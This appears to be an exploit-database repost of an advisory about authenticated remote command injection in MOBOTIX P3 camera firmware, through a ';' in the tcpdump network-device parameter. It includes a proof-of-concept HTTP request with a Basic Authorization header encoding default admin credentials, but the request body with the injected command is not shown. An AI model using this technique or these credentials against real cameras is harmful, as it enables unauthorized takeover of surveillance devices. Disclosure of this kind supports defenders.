MOBOTIX P3 Cameras MX-System < Authenticated Remote Code Execution Vulnerability

CVE Category Price Severity
CVE-2021-17260 CWE-77 Not specified High
Author Risk Exploitation Type Date
Erik Cottrell Critical Remote 2024-02-02
Our sensors found this exploit at:

Below is a copy:

MOBOTIX P3 Cameras MX-System < Authenticated Remote Code Execution Vulnerability
This vulnerability exists in versions of MOBOTIX P3 Cameras x14/x24/x15/x25, T24M/T25M prior to MX-System firmware. Due to the lack of input validation in the request sent to "/admin/tcpdump", this vulnerability leads to authenticated remote code execution.

In the affected module, tcpdump integration through the network interface has been observed via the web portal. The input in the "TCPDUMP_NETWORKDEVICE" parameter allows bypassing input validation by using the ";" character, enabling the execution of system commands.

# Proof of concept
POST /admin/tcpdump HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46bWVpbnNt
Connection: close

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.